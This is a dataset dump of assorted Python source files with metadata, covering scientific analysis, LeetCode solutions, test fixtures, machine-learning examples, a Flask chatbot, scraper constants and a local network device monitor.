np.arange( radStart + 0.5 * dr, radEnd + 0.5*dr, dr) # obtain r\n\nzStart=0\nzEnd=capLen\ndz=1.0\nzBins= int( (zEnd - zStart) / dz )\n\nz = np.arange( zStart + 0.5 * dz, zEnd + 0.5*dz, dz ) # obtain z\n\ndA=2.*np.pi*r*dr # area of a circular element\ndV=dA*dz # differential volume element\n\nzBins=z.shape[0] # number of zbins\nrBins=r.shape[0] # number of rbins\n\nrInt = np.zeros((rBins,1))\nzInt = np.zeros((rBins,1))\n\n#print( dr, dz, rBins, zBins, rho.shape )\nnElem=int((tEnd-tStart)/tDiff)+1\n\nmeniscusPosition=np.zeros((nElem,rBins))\n\ntimeCount=int((tStart-tFileStart)/tDiff)\ncounter=0\nfor time in np.arange(tStart, tEnd+tDiff, tDiff):\n\n dat=np.loadtxt('./postProcessed/density/density_vs_time_'+str(timeCount)+'.dat') \n\n N_rz=dat # N(r,z) at a function of time\n rho=N_rz/dV # number density = Number / volume\n\n count=0 # reset count to 0\n for i in np.arange(0, rBins, 1):\n\n popt, pcov = curve_fit(Tanh, z, rho[:,i], bounds=([5,0.,0.], [7., capLen, 1.5]), maxfev=1000)\n\n rInt[count] = r[i] # Note: I do not reser rInt, zInt because they are reset during this operation\n zInt[count] = popt[1]\n \n count += 1\n\n meniscusPosition[counter,:]=zInt.ravel()\n timeCount += 1\n counter += 1\n\nnp.savetxt('./postProcessed/interface_vs_time.dat',meniscusPosition)\n","sub_path":"analysisScripts/imbibition/binaryFluids/findMeniscus.py","file_name":"findMeniscus.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"481878937","text":"#!/usr/bin/env python\n# coding=utf-8\n#\n# Author: Lucas\n# Date: 2019-08-04 17:25:48\n\n\nclass Solution:\n def findComplement(self, num: int) -> int:\n mask = 1\n while mask < num:\n mask = (mask << 1) + 1\n # print(mask)\n return mask ^ num\n","sub_path":"401-500/476_NumberComplement/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546781768","text":"\"\"\"\ncommon pytest fixtures for tests in ctapipe\n\"\"\"\n\nimport pytest\n\nfrom copy import deepcopy\n\nfrom ctapipe.io import SimTelEventSource\nfrom ctapipe.utils import get_dataset_path\nfrom ctapipe.instrument import CameraGeometry\n\n\n@pytest.fixture(scope=\"session\")\ndef camera_geometries():\n return [\n CameraGeometry.from_name(name)\n for name in [\"LSTCam\", \"NectarCam\", \"CHEC\", \"FlashCam\", \"MAGICCam\"]\n ]\n\n\n@pytest.fixture(scope=\"session\")\ndef _global_example_event():\n \"\"\"\n helper to get a single event from a MC file. Don't use this fixture\n directly, rather use `test_event`\n \"\"\"\n filename = get_dataset_path(\"gamma_test_large.simtel.gz\")\n\n print(\"******************** LOAD TEST EVENT ***********************\")\n\n with SimTelEventSource(input_url=filename) as reader:\n event = next(iter(reader))\n\n return event\n\n\n@pytest.fixture(scope=\"session\")\ndef example_subarray():\n \"\"\"\n Subarray corresponding to the example event\n \"\"\"\n filename = get_dataset_path(\"gamma_test_large.simtel.gz\")\n\n print(\"******************** LOAD TEST EVENT ***********************\")\n\n with SimTelEventSource(input_url=filename) as reader:\n return reader.subarray\n\n\n@pytest.fixture(scope=\"function\")\ndef example_event(_global_example_event):\n \"\"\"\n Use this fixture anywhere you need a test event read from a MC file. For\n example:\n\n .. code-block::\n def test_my_thing(test_event):\n assert len(test_event.r0.tel) > 0\n\n \"\"\"\n return deepcopy(_global_example_event)\n\n\n@pytest.fixture(scope=\"session\")\ndef _subarray_and_event_gamma_off_axis_500_gev():\n from ctapipe.calib import CameraCalibrator\n from ctapipe.image import ImageProcessor\n\n path = get_dataset_path(\"lst_prod3_calibration_and_mcphotons.simtel.zst\")\n\n with SimTelEventSource(path) as source:\n it = iter(source)\n # we want the second event, first event is a corner clipper\n next(it)\n event = next(it)\n\n # make dl1a available\n calib = CameraCalibrator(source.subarray)\n calib(event)\n\n image_processor = ImageProcessor(\n source.subarray, is_simulation=source.is_simulation\n )\n\n # make dl1b available\n image_processor(event)\n return source.subarray, event\n\n\n@pytest.fixture(scope=\"function\")\ndef subarray_and_event_gamma_off_axis_500_gev(\n _subarray_and_event_gamma_off_axis_500_gev\n):\n \"\"\"\n A four LST subarray event with a nice shower, well suited to test\n reconstruction algorithms.\n\n This event should be very well reconstructible, as we have four LSTs with\n bright events.\n\n The event is already calibrated and image parameters have been calculated.\n\n You can safely mutate the event or subarray in a test as each test\n gets a fresh copy.\n \"\"\"\n subarray, event = _subarray_and_event_gamma_off_axis_500_gev\n return deepcopy(subarray), deepcopy(event)\n\n\n@pytest.fixture(scope=\"session\")\ndef prod5_gamma_simtel_path():\n return get_dataset_path(\n \"gamma_20deg_0deg_run2___cta-prod5-paranal_desert-2147m-Paranal-dark_cone10-100evts.simtel.zst\"\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef prod5_proton_simtel_path():\n return get_dataset_path(\n \"proton_20deg_0deg_run4___cta-prod5-paranal_desert-2147m-Paranal-dark-100evts.simtel.zst\"\n )\n","sub_path":"ctapipe/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"169328102","text":"import mysql.connector\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\ndiret = \"C:/Users/sucod/OneDrive/Lenovo/Documentos/Sql/\"\n\n#-----------------------------------------------\n#--------- Configura máquina SVM ---------------\n\ndf = pd.DataFrame(columns = [], index = [])\ndf2 = pd.DataFrame(columns = [], index = [])\n\n#--Para os dados coletados com lucros variando de 0 a 390%\nfor percent in range (0,391,10):\n df_aux = pd.read_csv(r\"{}\".format(diret)+\"/CSVLoja3/produto_{}.csv\".format(percent))\n df_aux[\"lucroPercent\"] = percent\n df = pd.concat([df, df_aux],ignore_index=True)\n\nfor percent in range (0,391,10): \n df_aux = pd.read_csv(r\"{}\".format(diret)+\"/CSVLoja3/aquisicao_{}.csv\".format(percent))\n for ID in range (1,251):\n count = 0\n for prodID in df_aux[\"Produto_idProduto\"]:\n if prodID == ID:\n count+=1\n if count == 0:\n nova_linha = {'Produto_idProduto':ID, 'Quantidade':0} \n df_aux = df_aux.append(nova_linha,ignore_index=True)\n\n df_aux = df_aux.groupby(\"Produto_idProduto\").mean() \n df2 = pd.concat([df2, df_aux[\"Quantidade\"]],ignore_index=True)\n \ndel df['Unnamed: 0']\ndel df['idProduto'] \ndel df['prodEstoque']\ndel df['Departamento_idDepartamento']\n\ndf[\"aquiMed\"] = df2.to_numpy()\ndf_produto = df\n\n# A variável alvo da aprendizagem será uma intersecção entre um lucro maior que 5000 com vendas\n# maiores que 500. Portanto, as duas condições simultaneamente serão o alvo:\ndf_produto[\"isLucro\"]=(df_produto[\"prodLucro\"]>5000)&(df_produto[\"prodVendas\"]>500)\n\nX = df.drop(['isLucro','prodGanhoAcum','prodVendas','prodCustoAcum','prodValor','prodGanhoAcum','prodLucro'], axis = 1)\nY = df['isLucro']\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.3)\nmodel = SVC(C = 1000, gamma = 0.001, kernel = 'rbf') #parâmetros otimizados\nmodel.fit(X_train, Y_train)\n\ndef max_lucro_min_aq(varcusto):\n \"\"\"\" Determina o máximo lucro predefino com o mínimo custo acumulado por\n estoque de produto. O argumento será o custo de aquisição do produto.\n Como ambas as condições devem ser satisfeitas simultaneamente, pode-se\n começar a busca pela condição a partir do maior lucro e o mínimo custo\n estará contido\"\"\"\n \n x = 390\n while x>1:\n aqui = 1\n while aqui<150:\n cond = model.predict(pd.DataFrame(data={'prodCusto': [varcusto], 'lucroPercent': [x], 'aquiMed': [aqui]}))[0]\n if cond!=False: #A precisão do modelo foi maior para detectar falsos (não-lucros) do que verdadeiros\n return [x,aqui]\n break\n aqui+=1\n x-=1\n if x == 1:\n return [1,1]\n\n\n#--------------------------------------------------\n#--- Inicia loja ---\n \nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"1234\",\n database = \"lojasimples\"\n)\nmycursor = mydb.cursor(buffered=True)\nnp.random.seed(101)\n\ndef lucro(var_val):\n \"\"\" Função antiga de determinação do lucro de acordo com o ajuste da curva\"\"\"\n \n return 5280.186/(var_val + 2.076)-100.932\n\ndef limpa_base(true_or_false = False):\n \"\"\"Redefine a Base de Dados\"\"\"\n \n if true_or_false:\n \n sql = \"DELETE FROM venda\"\n mycursor.execute(sql)\n sql = \"DELETE FROM cliente\"\n mycursor.execute(sql)\n sql = \"DELETE FROM aquisicao\"\n mycursor.execute(sql)\n sql = \"DELETE FROM produto\"\n mycursor.execute(sql)\n sql = \"DELETE FROM departamento\"\n mycursor.execute(sql)\n \n sql = \"ALTER TABLE aquisicao AUTO_INCREMENT = 1\"\n mycursor.execute(sql)\n sql = \"ALTER TABLE cliente AUTO_INCREMENT = 1\"\n mycursor.execute(sql)\n sql = \"ALTER TABLE venda AUTO_INCREMENT = 1\"\n mycursor.execute(sql)\n sql = \"ALTER TABLE departamento AUTO_INCREMENT = 1\"\n mycursor.execute(sql)\n sql = \"ALTER TABLE produto AUTO_INCREMENT = 1\"\n mycursor.execute(sql)\nlist_aq = []\ndef configura_loja():\n \"\"\"Define os parâmetros da loja\"\"\"\n \n #-------------------------------------------\n # 1 - Insere os Clintes na base de dados\n \n while(1):\n ins = \"INSERT INTO cliente (salarioCliente) VALUES({})\".format(np.round(np.random.rand()*1000+500,2))\n val = (\"\")\n mycursor.execute(ins, val)\n mydb.commit()\n mycursor.execute(\"SELECT * FROM cliente\")\n \n res = mycursor.fetchall()\n \n if len(res)>=50:\n break\n \n #-------------------------------------------\n #2 - Insere os departamentos da loja\n \n for x in range(1,16):\n ins = \"INSERT INTO departamento () VALUES()\"\n val = (\"\")\n mycursor.execute(ins, val)\n mydb.commit()\n \n #-------------------------------------------\n #3 - Insere os produtos no esstoque\n \n for x in range(1,251):#251\n custo = np.round(np.random.rand()*50+1,2)\n valor = custo*(1+(max_lucro_min_aq(custo))[0]/100)\n estoque = (max_lucro_min_aq(custo))[1]\n list_aq.append([x,estoque])\n ins = \"INSERT INTO produto (prodCusto, prodValor, prodEstoque, Departamento_idDepartamento)\\\n VALUES({:.2f},{:.2f},{},{})\".format(custo, valor, estoque+20, np.random.randint(1,16))\n mycursor.execute(ins)\n mydb.commit()\n \n #--------------------------------------------\n #Exporta a lista com os lucros percentuais que devem ser colocados em cada produto\n #Preferível para melhor o desempenho das transações.\n \n pd.DataFrame(list_aq).to_csv(r'C:\\Users\\sucod\\OneDrive\\Lenovo\\Documentos\\Sql\\CSVLojaSVM3\\list_aq.csv')","sub_path":"Análise_de_Dados_com_MySQL_e_Python/2_SVM/start_loja_db_SVM3.py","file_name":"start_loja_db_SVM3.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546383818","text":"#Random forest regression\n\n#Importing the libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Importing the dataset\ndataset = pd.read_csv('datasets_88705_204267_Real estate.csv')\nX = dataset.iloc[:,1:-1].values\ny = dataset.iloc[:,-1].values\n\n#Visualising the whole dataset values\na = np.arange(len(y))\nplt.bar(a,y , color = 'black', width=1 )\nplt.title('House Prices' )\nplt.show()\n\n#Splitting the dataset into training and test sets\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n#training the model on the dataset\nfrom sklearn.ensemble import RandomForestRegressor\nregressor = RandomForestRegressor( n_estimators = 100, random_state =0)\nregressor.fit(X_train,y_train)\n\n#Predicting the results\ny_pred = regressor.predict(X_test)\nnp.set_printoptions(precision = 2)\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))\n\n#Evaluating the Model performance\nfrom sklearn.metrics import r2_score\nprint(\"Performance of Random Tree Regression model : \",r2_score(y_test, y_pred))\n\n#Creating an array with serail numbers of values in predicted and the test set\na = np.arange(len(y_test))\n\n#Plotting the graph\nplt.plot(a,y_test , color = 'blue', label = 'predicted values')\nplt.plot(a,y_pred , color = 'green', label = 'original values')\nplt.legend()\nplt.title('Random forest regression model \\n Model performance(r squared value) : %3f '%r2_score(y_test, y_pred))\nplt.show()","sub_path":"Random Forest Regression/RandomForestRegression.py","file_name":"RandomForestRegression.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"409225172","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# main.py\n# @Author : simon (simonjoe246@gmail.com)\n# @Link : https://simonjoe246.github.io/\n# @Date : 9/5/2018, 9:55:22 AM\n\nfrom flask import Flask\nfrom robot import myrobot\nfrom werobot.contrib.flask import make_view\n\napp = Flask(__name__)\n\napp.add_url_rule(rule='/', # 添加路由\nendpoint='werobot', # Flask 的 endpoint\nview_func = make_view(myrobot), # 基于 BaseRobot 生成 Flask view\nmethods=['GET', 'POST'])\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',\n port='9000')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"89282018","text":"import wx, sys, os\nsys.path.append('..')\nfrom ..Colors import *\nfrom RanksPanel import *\nfrom InspectionsPanel import *\nfrom ..data import *\nfrom ..EventData import *\nfrom ..drawables import *\nfrom MatchesPanel import *\nclass MainScreen(wx.Panel):\n def __init__(self,parent):\n wx.Panel.__init__(self,parent)\n self.SetSize((1920,1080))\n self.SetBackgroundColour(COLORS[\"vexRed\"])\n self.mainPanel = None\n self.secondPanel = None\n\n self.smallLogoPic = None\n self.logoTimer = None\n self.logoRect = None\n\n self.vexSmallLogo = None\n \n self.mainPanelHeader = None\n self.secondPanelHeader = None\n\n self.Font_NotoSans_22_Normal = None\n self.Font_NotoSans_22_Bold = None\n\n self.inspectionsToMatchTimer = None\n \n genFonts()\n #self.SetBackgroundColour(COLORS[\"Black\"])\n def onReady(self,mainPanel = \"Rankings\", secondPanel = \"Matches\", showInspections=False,scrollSpeed=270):\n self.mainPanelType = mainPanel\n self.secondPanelType = secondPanel\n self.showInspections = showInspections\n self.scrollSpeed = scrollSpeed\n\n ###SETUP FONTS AND HEADERS###\n if os.name == 'nt':\n self.Font_NotoSans_22_Normal = wx.Font(22,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"Noto Sans\")\n self.Font_NotoSans_22_Bold = wx.Font(22,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"Noto Sans\")\n\n self.Font_NotoSans_28_Bold = wx.Font(28,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"Noto Sans\")\n\n self.Font_NotoSans_36_Normal = wx.Font(36,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"Noto Sans\")\n self.Font_NotoSans_36_Bold = wx.Font(36,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"Noto Sans\")\n\n self.Font_NotoSans_55_Normal = wx.Font(55,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"Noto Sans\")\n self.Font_NotoSans_55_Bold = wx.Font(55,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"Noto Sans\")\n else:\n self.Font_NotoSans_22_Normal = wx.Font(22,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"NotoSans\")\n self.Font_NotoSans_22_Bold = wx.Font(22,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"NotoSans\")\n\n self.Font_NotoSans_36_Normal = wx.Font(36,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"NotoSans\")\n self.Font_NotoSans_36_Bold = wx.Font(36,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"NotoSans\")\n\n self.Font_NotoSans_55_Normal = wx.Font(55,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"NotoSans\")\n self.Font_NotoSans_55_Bold = wx.Font(55,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"NotoSans\")\n self.Font_NotoSans_28_Bold = wx.Font(28,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"NotoSans\")\n \n self.mainPanelHeader = Header(self,-1,\"Qualification Rankings\",self.Font_NotoSans_36_Bold,COLORS[\"White\"])\n self.mainPanelHeader.SetSize((830,150))\n\n \n #Check if inspections are needed\n if self.showInspections:\n self.secondPanel = None\n self.mainPanel = InspectionsPanel(self)\n self.mainPanelHeader.SetFont(self.Font_NotoSans_55_Bold)\n self.mainPanelHeader.SetLabel(EVENT_DATA.getDivisionName() + \" Inspections\")\n self.mainPanelHeader.SetPosition((250,12))\n self.SetBackgroundColour(COLORS[\"vexTxtDarkGray\"])\n if self.inspectionsToMatchTimer != None:\n if self.inspectionsToMatchTimer.IsRunning():\n self.inspectionsToMatchTimer.Stop()\n self.inspectionsToMatchTimer.Destroy()\n self.inspectionsToMatchTimer = wx.Timer(self,-1)\n self.Bind(wx.EVT_TIMER,self.checkInspectionData,self.inspectionsToMatchTimer)\n self.inspectionsToMatchTimer.Start(1000)\n #self.mainPanel.SetDoubleBuffered(True)\n else:\n self.setupMainPanel()\n self.setupSecondPanel()\n #########\n\n\n self.vexSmallLogo = wx.StaticBitmap(self,-1,wx.BitmapFromImage(wx.Image(os.path.join(os.getcwd(),\"Resources\",\"Images\",\"Display\",\"vrc_logo_titlebar.png\"),wx.BITMAP_TYPE_PNG)))\n self.vexSmallLogo.SetPosition((self.GetSize()[0]-227,25))\n ###show panels###\n if self.mainPanel != None:\n self.mainPanel.Show() \n \n if self.secondPanel != None:\n self.secondPanel.Show()\n def setupMainPanel(self):\n if self.mainPanelType == \"Rankings\":\n self.mainPanel = RanksPanel(self,speed=self.scrollSpeed)\n self.mainPanelHeader.SetFont(self.Font_NotoSans_28_Bold)\n self.mainPanelHeader.SetLabel(EVENT_DATA.getDivisionName() + \" Qualification Rankings\")\n if os.name == 'nt':\n self.mainPanelHeader.SetSize((1200,self.mainPanelHeader.GetSize()[1]))\n \n #self.mainPanelHeader.SetPosition((10,70))\n self.mainPanelHeader.SetExtraStyle(wx.ALIGN_CENTRE_HORIZONTAL)\n self.mainPanelHeader.SetPosition((self.mainPanelHeader.GetPosition()[0],70))\n else:\n self.mainPanelHeader.SetPosition((10+((1200-self.mainPanelHeader.GetSize()[0])/2),70))\n self.mainPanel.SetSize((1200,900))\n self.mainPanel.SetPosition((10,160))\n self.mainPanel.SetBackgroundColour(COLORS[\"vexBlue\"])\n \n def setupSecondPanel(self):\n if self.secondPanelType == \"Matches\":\n self.secondPanelHeader = Header(self,-1,\"Match Schedule and Results\",self.Font_NotoSans_28_Bold,COLORS[\"White\"])\n self.secondPanelHeader.SetPosition((1225+(685-self.secondPanelHeader.GetSize()[0])/2,205))\n self.secondPanel = MatchesPanel(self)\n self.secondPanel.SetPosition((1225,252))\n self.secondPanel.SetSize((685,808))\n self.secondPanel.SetBackgroundColour(COLORS[\"White\"])\n self.secondPanel.Refresh()\n if not self.secondPanel.IsShown():\n self.secondPanel.Show()\n def checkInspectionData(self,evt):\n switchMain = True\n if self.mainPanel != None and self.showInspections:\n if len(EVENT_DATA.matches) > 0:\n for team in EVENT_DATA.teams:\n for match in EVENT_DATA.matches:\n if team == EVENT_DATA.matches[match].getRed1() or team == EVENT_DATA.matches[match].getRed2() or team == EVENT_DATA.matches[match].getRed3() or team == EVENT_DATA.matches[match].getBlue1() or team == EVENT_DATA.matches[match].getBlue2() or team == EVENT_DATA.matches[match].getBlue3():\n EVENT_DATA.teams[team].setIsCompeting(True)\n if EVENT_DATA.teams[team].getIsCompeting() != True or EVENT_DATA.teams[team].getInspectionStatus() != \"Completed\":\n switchMain = False\n \n if switchMain:\n self.mainPanel.Hide()\n self.mainPanel.DestroyChildren()\n self.mainPanel.Destroy()\n if self.secondPanel != None:\n self.secondPanel.Hide()\n self.secondPanel.DestroyChildren()\n self.secondPanel.Destroy()\n if self.inspectionsToMatchTimer != None:\n self.inspectionsToMatchTimer.Stop()\n self.setupMainPanel()\n self.setupSecondPanel()\n self.SetBackgroundColour(COLORS[\"vexRed\"])\n self.Refresh()\n \n if evt != None:\n evt.Skip()","sub_path":"VEXDisplay/Classes/panels/MainScreen.py","file_name":"MainScreen.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"383844916","text":"HEADERS_LIST = ['Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/64.0.3282.140 Chrome/64.0.3282.140 Safari/537.36' ]\n\nPROXY_LIST = []\n\nPROXY = {\"https\": \"\"}\n\nHEADERS = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"keep-alive\",\n \"Content-Type\" : \"application/json;charset=UTF-8\",\n \"User-Agent\": ''\n}\n\n\n# GOOD status resposne 200\nGOOD_STATUS = 200\n\n# BAD status response 503 it means amazon has blocked us\nBAD_STATUS = 503\n\n# Page not found response 404\nPAGE_NOT_FOUND = 404\n\n\nMAX_RETRIES = 1\n\n# to compare with config.write_to value\nWRITE_TO_DB = 1\n\n# to compare with config.write_to value\nWRITE_TO_FILE = 2\n\n# to compare with config.write_to value\nWRITE_TO_CASSANDRA = 3\n\n# to compare with config.write_to_value\n\n","sub_path":"Python_scripts/Global_Constants.py","file_name":"Global_Constants.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"459287527","text":"import socket\nimport multiprocessing\nimport subprocess\nimport os\nimport pygame\nimport time\nimport re\n\nfrom pygame import mixer\nfrom contextlib import contextmanager\nfrom termcolor import colored\n\n@contextmanager\ndef managed_file(name):\n try:\n f = open('ip_list.txt', 'r')\n yield f\n\n finally:\n f.close()\n\n# Функция сигнализации\ndef signaling():\n print('\\n\\x1b[37;5;41m Detected unknown device !!! \\x1b[0m')\n mixer.init()\n song = mixer.music.load('./signaling.mp3')\n clock = pygame.time.Clock()\n mixer.music.play()\n while True:\n clock.tick(1000)\n pygame.quit()\n\ndef pinger(job_q, results_q):\n DEVNULL = open(os.devnull, 'w')\n while True:\n ip = job_q.get()\n if ip is None:\n break\n try:\n subprocess.check_call(['ping', '-c1', ip],\n stdout=DEVNULL)\n results_q.put(ip)\n except:\n pass\n\ndef get_my_ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n ip = s.getsockname()[0]\n s.close()\n return ip\n\ndef map_network(pool_size=255):\n ip_list = list()\n # получение IP и составление базы\n ip_parts = get_my_ip().split('.')\n base_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.'\n # подготовка очереди заданий\n jobs = multiprocessing.Queue()\n results = multiprocessing.Queue()\n pool = [multiprocessing.Process(target=pinger, args=(jobs, results)) for i in range(pool_size)]\n\n for p in pool:\n p.start()\n # процессы пинга устройств\n for i in range(1, 255):\n jobs.put(base_ip + '{0}'.format(i))\n for p in pool:\n jobs.put(None)\n for p in pool:\n p.join()\n # сбор результатов\n while not results.empty():\n ip = results.get()\n ip_list.append(ip)\n return ip_list\n\n# Основная функция\ndef scanning(chois, scan_time = 10):\n if chois == 1:\n print(colored(' Сканирование... ', 'red', 'on_cyan'))\n elif chois == 2:\n print(colored(' Сканирование... ', 'red', 'on_cyan'), ('---'), colored('[', 'yellow'), colored('Интервальное сканирование'), colored(']', 'yellow'))\n else: print(colored('Видимо возникла ошибка ...', 'red'))\n lst = map_network()\n\n # Составление белого списка IP\n white_ip_list = []\n with managed_file('ip_list.txt') as f:\n read_ip_list = f.read().splitlines()\n for ip in read_ip_list:\n white_ip_list.append(ip)\n\n # сканирование полученных результатов\n gandon = []\n for i in lst:\n if i in white_ip_list: pass\n else:\n gandon.append(i)\n\n # если обнаружены неизвестные уствойства\n if len(gandon) > 0:\n print(f'Обнаружено {len(gandon)} га́ндонов\\n')\n for l in gandon:\n print(f'\\x1b[0;31m{l}\\x1b[0m')\n while True:\n signaling()\n\n else:\n print(colored('[ -- ', 'cyan'),('Га́ндонов на горизонте не видать'), colored(' -- ] ', 'cyan'), colored('\\n\\nПодключенные устройства:', 'green'))\n for device in lst: print(colored(device, 'yellow'))\n if chois == 2:\n print(colored(f\"\\nОжидание {scan_time} секунд...\\n\", 'magenta'))\n time.sleep(int(scan_time))\n","sub_path":"analisis.py","file_name":"analisis.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"577562011","text":"from django.db import models\n\n# Create your models here.\n\nclass content(models.Model):\n\theading = models.CharField(max_length=200)\n\tabout_topic = models.TextField()\n\timage=models.ImageField(upload_to='photos',null=True)\n\t\n\t\n","sub_path":"mobilegeek/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"399459903","text":"import sys # for sys. exit\ndef choose( *args ):\n\t\"\"\"\n\tAccepts a list of options,\n\tthen traps the player\n\tuntil it types one of them.\n\t\"\"\"\n\n\t# First prepare to print the list of options.\n\tstring = \"[\"\n#\targs.append( \"quit\" )\n\tfor choice in enumerate(args):\n\t\tstring += choice[1]\n\t\tif choice[0] != len(args) - 1:\n\t\t\tstring += \"/\"\n\tstring += \"] \"\n\n\t# Then get the choice.\n\tvalid = 0\n\twhile valid == 0:\n\t\tplayer_choice = raw_input( string )\n\t\tif player_choice in args:\n\t\t\tvalid = 1\n\t\telse:\n\t\t\tprint( \"Invalid response.\" )\n\t\n\tif player_choice == \"quit\":\n\t\tsys.exit()\n\n\treturn player_choice\n","sub_path":"tools/choose.py","file_name":"choose.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"438679031","text":"from injector import inject, AssistedBuilder\nfrom slippinj.cli.deploy_configuration import DeployConfiguration\n\n\nclass DefaultConfiguration(object):\n \"\"\"Get the default configuration for the workflows\"\"\"\n\n @inject(deploy_configuration=AssistedBuilder(DeployConfiguration), configuration_parser='configuration_parser')\n def __init__(self, deploy_configuration, configuration_parser):\n \"\"\"\n Initialize the class\n :param deploy_configuration: DeployConfiguration\n :param configuration_parser: ConfigParser\n \"\"\"\n super(DefaultConfiguration, self).__init__()\n\n self.__deploy_configuration = deploy_configuration\n self.__configuration_parser = configuration_parser\n\n def get(self, environment, arguments, workflow_configuration):\n \"\"\"\n Get configuration parameters that are common to the workflows\n :param environment: string\n :param arguments: Namespace\n :param workflow_configuration: dict\n :return: dict\n \"\"\"\n default_variables = ['hive_metastore_bucket', 'hdfs_deploy_folder']\n default_configuration = {}\n interactive_provided = False\n deploy_configuration = self.__deploy_configuration.build(environment=environment,\n configuration_parser=self.__configuration_parser)\n args = vars(arguments)\n\n for variable in default_variables:\n if variable in args and False != args[variable]:\n default_configuration[variable] = args[variable]\n interactive_provided = True\n elif variable in workflow_configuration:\n default_configuration[variable] = workflow_configuration[variable]\n elif deploy_configuration.get(variable):\n default_configuration[variable] = deploy_configuration.get(variable)\n else:\n default_configuration[variable] = raw_input(\n 'Please, provide the {var_name} value: '.format(var_name=variable.replace('-', ' ')))\n interactive_provided = True\n\n if interactive_provided and 'y' == (\n raw_input('Would you like to save the provided information in the config file: [Y/N] ')).lower():\n for key in default_configuration:\n deploy_configuration.set(key, default_configuration[key])\n\n return default_configuration\n","sub_path":"src/slippinj/cli/interactive/default_configuration.py","file_name":"default_configuration.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"95860277","text":"import re\r\nimport os\r\nimport urllib.request\r\nfrom collections import defaultdict\r\n# data provided\r\ntmp = os.getenv(\"TMP\", \"/tmp\")\r\ntmp = '/home/ch/programming/pybites/data'\r\nstopwords_file = os.path.join(tmp, 'stopwords')\r\nharry_text = os.path.join(tmp, 'harry')\r\nurllib.request.urlretrieve(\r\n 'https://bites-data.s3.us-east-2.amazonaws.com/stopwords.txt',\r\n stopwords_file\r\n)\r\nurllib.request.urlretrieve(\r\n 'https://bites-data.s3.us-east-2.amazonaws.com/harry.txt',\r\n harry_text\r\n)\r\nfreq = defaultdict(int)\r\nstopwords = list()\r\nwith open(stopwords_file) as stop:\r\n for line in stop:\r\n stopwords.append(line.strip())\r\n\r\ndef get_harry_most_common_word():\r\n with open(harry_text) as harry:\r\n count = 0\r\n for line in harry:\r\n count += 1\r\n line = re.sub(r\"'|,|\\.|;\",\"\",line).lower()\r\n for word in line.split():\r\n if word not in stopwords and word.isalpha():\r\n # with defaultdict:\r\n freq[word] += 1\r\n # without defaultdict: \r\n # if freq.get(word):\r\n # freq[word] += 1\r\n # else:\r\n # freq[word] = 1\r\n return sorted(freq.items(),key=lambda x: x[1])[-1]\r\n 